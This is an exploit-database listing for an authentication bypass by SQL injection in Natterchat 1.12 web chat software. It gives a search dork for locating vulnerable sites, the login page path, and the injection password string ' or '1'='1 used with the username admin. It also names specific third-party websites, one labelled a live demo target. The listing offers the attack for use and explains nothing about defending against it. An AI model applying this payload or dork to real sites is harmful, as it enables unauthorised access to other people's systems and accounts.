[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability

Author
Stack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4217
Category
web applications
Date add
20-11-2008
Platform
unsorted
================================================================
Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability
================================================================


[+] Script Name    : Natterchat v1.12 (Auth Bypass) Remote SQL Injection Vulnerability
[+] Author         : Mountassif Moad
[+] Dork           : Powered by Natterchat v1.12

[+] Expl0iT :
1) Go to the Login page http://www.site.il/chat/nattechat/home.asp
2) Username : admin 
   Password : ' or '1'='1

Live Demo
http://www.sprq.ca/cgi-bin/natterchat/chat.asp




#  0day.today [2024-11-16]  #